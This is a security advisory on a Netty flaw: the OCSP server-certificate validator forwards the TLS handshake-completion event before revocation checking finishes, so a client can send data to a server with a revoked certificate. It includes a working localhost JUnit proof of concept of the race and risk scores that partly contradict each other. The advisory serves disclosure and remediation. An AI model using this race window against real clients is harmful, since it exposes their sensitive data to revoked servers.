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GHSA-wc96-39fc-566f

HighCVSS 7.4 / 10
Published Jul 22, 2026·Last modified Jul 22, 2026
Affected Components(0)

No affected components available

Description

Summary

Netty's OcspServerCertificateValidator forwards the SslHandshakeCompletionEvent before the asynchronous OCSP validation completes. This allows the client's downstream handlers to send sensitive application data (e.g., HTTP requests) to a revoked server before the channel is closed by the OCSP check.

Details

In io.netty.handler.ssl.ocsp.OcspServerCertificateValidator#userEventTriggered, when an SslHandshakeCompletionEvent is received, the validator immediately calls ctx.fireUserEventTriggered(evt). It then initiates an asynchronous OCSP query using OcspClient.query.

Because the handshake completion event is forwarded immediately, downstream handlers in the client's pipeline are notified that the TLS handshake is successful. They may then begin reading and processing incoming application data or sending outgoing data. If the OCSP response later indicates the server's certificate is REVOKED, the validator closes the channel, but by this time, the client may have already leaked sensitive data to a revoked server or processed malicious responses from it.

PoC

    @Test
    public void test() throws Exception {
        EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            OCSPRespBuilder respBuilder = new OCSPRespBuilder();
            OCSPResp response = respBuilder.build(OCSPRespBuilder.INTERNAL_ERROR, null);
            byte[] responseEncoded = response.getEncoded();

            IoTransport mockTransport = IoTransport.create(group.next(), () -> {
                NioSocketChannel channel = new NioSocketChannel();
                channel.pipeline().addFirst(new ChannelOutboundHandlerAdapter() {
                    @Override
                    public void connect(ChannelHandlerContext ctx, SocketAddress remoteAddress, SocketAddress localAddress, ChannelPromise promise) {
                        promise.setSuccess();

                        ctx.executor().schedule(() -> {
                            ctx.pipeline().fireChannelActive();

                            DefaultFullHttpResponse httpResponse = new DefaultFullHttpResponse(
                                    HttpVersion.HTTP_1_1, HttpResponseStatus.OK, Unpooled.wrappedBuffer(responseEncoded));
                            httpResponse.headers().set(HttpHeaderNames.CONTENT_TYPE, "application/ocsp-response");
                            httpResponse.headers().set(HttpHeaderNames.CONTENT_LENGTH, httpResponse.content().readableBytes());

                            ctx.pipeline().fireChannelRead(httpResponse);
                        }, 500, TimeUnit.MILLISECONDS);
                    }
                });
                return channel;
            }, NioDatagramChannel::new);

            X509Bundle caRoot = new CertificateBuilder()
                    .algorithm(CertificateBuilder.Algorithm.rsa2048)
                    .subject("CN=TrustedRootCA")
                    .setIsCertificateAuthority(true)
                    .buildSelfSigned();

            GeneralName ocspName = new GeneralName(GeneralName.uniformResourceIdentifier, "http://localhost/");
            AuthorityInformationAccess aia = new AuthorityInformationAccess(new AccessDescription(AccessDescription.id_ad_ocsp, ocspName));
            X509Bundle targetCert = new CertificateBuilder()
                    .algorithm(CertificateBuilder.Algorithm.rsa2048)
                    .subject("CN=TargetServer")
                    .addExtensionOctetString("1.3.6.1.5.5.7.1.1", false, aia.getEncoded())
                    .buildIssuedBy(caRoot);

            SslContext serverSslCtx = SslContextBuilder.forServer(targetCert.getKeyPair().getPrivate(), targetCert.getCertificate()).build();

            CopyOnWriteArrayList<String> receivedData = new CopyOnWriteArrayList<>();
            CountDownLatch dataReceivedLatch = new CountDownLatch(1);

            new ServerBootstrap()
                    .group(group)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new ChannelInitializer<SocketChannel>() {
                        @Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline().addLast(serverSslCtx.newHandler(ch.alloc()));
                            ch.pipeline().addLast(new SimpleChannelInboundHandler<ByteBuf>() {
                                @Override
                                protected void channelRead0(ChannelHandlerContext ctx, ByteBuf msg) {
                                    receivedData.add(msg.toString(CharsetUtil.UTF_8));
                                    dataReceivedLatch.countDown();
                                }
                            });
                        }
                    })
                    .bind(8080)
                    .sync()
                    .channel();

            SslContext clientSslCtx = SslContextBuilder.forClient()
                    .trustManager(InsecureTrustManagerFactory.INSTANCE)
                    .build();

            DnsNameResolver resolver = OcspServerCertificateValidator.createDefaultResolver(mockTransport);
            Channel clientChannel = new Bootstrap()
                    .group(group)
                    .channel(NioSocketChannel.class)
                    .handler(new ChannelInitializer<SocketChannel>() {
                        @Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline().addLast(clientSslCtx.newHandler(ch.alloc(), "127.0.0.1", 8080));
                            ch.pipeline().addLast(new OcspServerCertificateValidator(true, false, mockTransport, resolver));
                            ch.pipeline().addLast(new ChannelInboundHandlerAdapter() {
                                @Override
                                public void userEventTriggered(ChannelHandlerContext ctx, Object evt) {
                                    if (evt instanceof SslHandshakeCompletionEvent) {
                                        SslHandshakeCompletionEvent sslEvent = (SslHandshakeCompletionEvent) evt;
                                        if (sslEvent.isSuccess()) {
                                            ctx.writeAndFlush(Unpooled.copiedBuffer("SECRET_DATA", CharsetUtil.UTF_8));
                                        }
                                    }
                                    ctx.fireUserEventTriggered(evt);
                                }
                            });
                        }
                    })
                    .connect("127.0.0.1", 8080)
                    .sync()
                    .channel();

            assertTrue(clientChannel.closeFuture().await(5, TimeUnit.SECONDS));

            Thread.sleep(200);

            assertFalse(receivedData.contains("SECRET_DATA"), "Server should not receive the data.");
        } finally {
            group.shutdownGracefully();
        }
    }

Impact

TOCTOU. Client applications relying on OcspServerCertificateValidator to enforce server certificate revocation are impacted. A malicious server with a revoked certificate can successfully establish a TLS connection and receive sensitive application data from the client (or send malicious data to it) during the window between the TLS handshake completing and the asynchronous OCSP check failing.

Risk Scores
Base Score
7.4

The vulnerability can be exploited over the network without needing physical access. It is difficult for an attacker to exploit this vulnerability and may require special conditions. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a high impact on the confidentiality of the information. There is a high impact on the integrity of the data.

Threat Intelligence
6.8

Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.

EPSS
0.11%

The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.

Exploit
Not available

We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.

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